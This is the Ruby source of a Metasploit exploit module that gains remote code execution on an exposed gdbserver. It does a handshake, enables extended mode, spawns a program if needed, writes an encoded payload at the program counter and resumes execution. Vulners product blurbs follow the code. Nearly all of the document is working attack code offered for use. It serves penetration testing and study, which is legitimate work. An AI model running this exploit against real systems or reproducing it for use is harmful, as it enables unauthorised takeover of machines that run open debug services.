##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Gdb
def initialize(info = {})
super(
update_info(
info,
'Name' => 'GDB Server Remote Payload Execution',
'Description' => %q{
This module attempts to execute an arbitrary payload on a loose gdbserver service.
},
'Author' => [ 'joev' ],
'Targets' => [
[ 'x86', { 'Arch' => ARCH_X86 } ],
[ 'x86_64', { 'Arch' => ARCH_X64 } ],
[ 'ARMLE', { 'Arch' => ARCH_ARMLE } ],
[ 'AARCH64', { 'Arch' => ARCH_AARCH64 } ],
],
'References' => [
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3691']
],
'DisclosureDate' => '2014-08-24',
'Platform' => %w[linux unix osx],
'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
'Notes' => {
'SideEffects' => [IOC_IN_LOGS],
'Stability' => [CRASH_SERVICE_DOWN, SERVICE_RESOURCE_LOSS],
'Reliability' => [REPEATABLE_SESSION]
},
'DefaultTarget' => 0,
'DefaultOptions' => {
'PrependFork' => true
}
)
)
register_options([
OptString.new('EXE_FILE', [
false,
'The exe to spawn when gdbserver is not attached to a process.',
'/bin/true'
])
])
end
def exploit
connect
print_status('Performing handshake with gdbserver...')
handshake
res = enable_extended_mode
if res !~ /OK/
fail_with(Failure::UnexpectedReply, 'Could not enable extended mode.')
end
begin
print_status('Stepping program to find PC...')
gdb_data = process_info
rescue BadAckError, BadResponseError
# gdbserver is running with the --multi flag and is not currently
# attached to any process. let's attach to /bin/true or something.
print_status("No process loaded, attempting to load #{datastore['EXE_FILE']}...")
res = run_file(datastore['EXE_FILE'])
if res !~ /OK/
fail_with(Failure::UnexpectedReply, 'Could not load new program.')
end
gdb_data = process_info
end
gdb_pc, gdb_arch = gdb_data.values_at(:pc, :arch)
unless payload.arch.include?(gdb_arch)
fail_with(Failure::BadConfig, "The payload architecture is incorrect: the payload is #{payload.arch.first}, but #{gdb_arch} was detected from gdb.")
end
print_status("Writing payload at #{gdb_pc}...")
write(payload.encoded, gdb_pc)
print_status('Executing the payload...')
continue({read: false})
ensure
disconnect if sock
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation